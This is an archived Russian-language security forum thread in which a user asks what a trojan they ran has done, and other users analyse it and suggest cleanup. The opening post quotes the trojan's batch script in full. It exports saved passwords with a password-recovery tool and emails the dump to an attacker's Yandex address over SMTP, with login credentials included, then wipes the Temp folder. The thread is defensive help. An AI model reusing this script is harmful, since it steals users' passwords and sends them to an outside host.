Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Что делает этот троян?

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Защита] >> Что делает этот троян?
Имя
Сообщение << Старые топики   Новые топики >>
Что делает этот троян? - 2012-05-07 01:39:23.570000   
Ainoshin

Сообщений: 3
Оценки: 0
Присоединился: 2012-05-07 01:23:43.080000
Здравствуйте, я совершенно не разбирающийся в программировании человек, решил испытать судьбу(да и по дурости, что уж и говорить), и в первый раз запустил подозрительную программу собственноручно, без виртуальной машины.
Ссылка на файл http://ifolder.ru/30336679
Вирустотал выдал вот что https://www.virustotal.com/file/269a638b853b65cb803b23f77ee6b17ebcf92a47677340f4a781225dc1d93bdc/analysis/1336337527/

Скачал Spybot, search and destroy, проверил систему Nod32 - ничего.
Все время смотрю на процессы.
Скачал PE Explorer, в resource editor увидел данный текст
quote:

@echo off
:start
ping ya.ru -n 5 &gt;nul
if %errorlevel%==0 (goto send) else (goto end)

:end
goto :start

:send
blat.exe -install -server smtp.yandex.ru -port 587 -f trojan.gg@yandex.ru -u trojan.gg -pw 123321z
mpr.exe /export
ren *.mpf pass.mpf
blat.exe -body PassReg -to trojan.gg@yandex.ru -attach pass.mpf
del %Temp%\*.* /Q /S /F

Также:
quote:


blat.exe*115200*block_reader.sys*1920*HookLib.dll*43008*MPR.exe*3392512*mpr.ini*258*blat.dll*122880*

Где-то было что-то наподобие 1.bat, больше ничего членораздельного не увидел. Кажется, это аттачмент он приложил?

Способ передачи файла - скайп, понятно, что невозможно определить откуда.

В момент запуска программы был открыт steam.exe и браузер Mozilla Firefox Aurora. Боюсь вырубить компьютер лишний раз.

Вот, собственно и вопросы: что сделала эта программа моему компу? Какие пароли он украл? Могу ли я сейчас поменять все пароли?
Что делать?
Собственно, помогите, пожалуйста.
Post #: 1
RE: Что делает этот троян? - 2012-05-07 08:01:02.636666   
zzsnn

Сообщений: 7459
Оценки: 680
Присоединился: 2007-09-25 07:17:14.240000
Что делает и что может сделать, сказать невозможно. Нужно дизассемблировать файлы blat.exe и mpr.exe.
Но судя по всему, трой просто тащит у тебя пароли.
Соединияется (проверяя соединение), потом тупо тащит все *.mpf, и шлёт на мыло trojan.gg@yandex.ru (пароль к ящику 123321z, там кстати ничего нет), и подчищает всё в папке Temp.
Данный трой должно быть несложно прибить. Он в автозагрузке виден должен быть. Судя по тексту троя создатель себя особо не заморачивал. Вряд ли что-то крутое есть.
Антивирусы на такое совсем и не должны реагировать. Всё в пределах разарешённого.
Тут должен срабатывать файрволл, зарезая любую попытку соедениться и передать данные. А его, судя по всему у тебя нет.
Как грохнуть трой? Давай лог AutoRuns ( http://technet.microsoft.com/ru-ru/sysinternals/bb963902 ), выложи на любой файлообменник, сюда ссылку. Посмотрим.
Post #: 2
RE: Что делает этот троян? - 2012-05-07 09:27:11.800000   
Flint_ta

Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
Такая поделка тащит пароли и обычно в автозапуск не записывается. blat.exe только отправляет письмо. mpr.exe - это multi password recovery, собирает пароли в файл pass.mpf. Батник все это хозяйство запускает, собственно он и представляет интерес, т.к. в нем записана почта и пароль кулхацкера.
Post #: 3
RE: Что делает этот троян? - 2012-05-07 11:58:01.710000   
Ainoshin

Сообщений: 3
Оценки: 0
Присоединился: 2012-05-07 01:23:43.080000
Логи Autoruns - http://ifolder.ru/30339730, Пароль - xaker
В logon был файл rdpclip, это он?
Post #: 4
RE: Что делает этот троян? - 2012-05-07 12:11:19.210000   
Flint_ta

Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
UpdReg Creative UpdReg Creative Technology Ltd. c:\windows\updreg.exe
Bonjour Service Apple Inc. c:\program files\bonjour\mdnsresponder.exe

отключите
Post #: 5
RE: Что делает этот троян? - 2012-05-08 01:01:52.380000   
Ainoshin

Сообщений: 3
Оценки: 0
Присоединился: 2012-05-07 01:23:43.080000
В общем, путем многих исследований я выявил, что этот троян одноразовый.
Стырил ключ при запуске, отослал и все. Никаких отложенных задач.
Странных процессов не нашел, дотошно исследовал каждый.

Всем спасибо.
Post #: 6
Страниц:  [1]
Все форумы >> [Защита] >> Что делает этот троян?







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.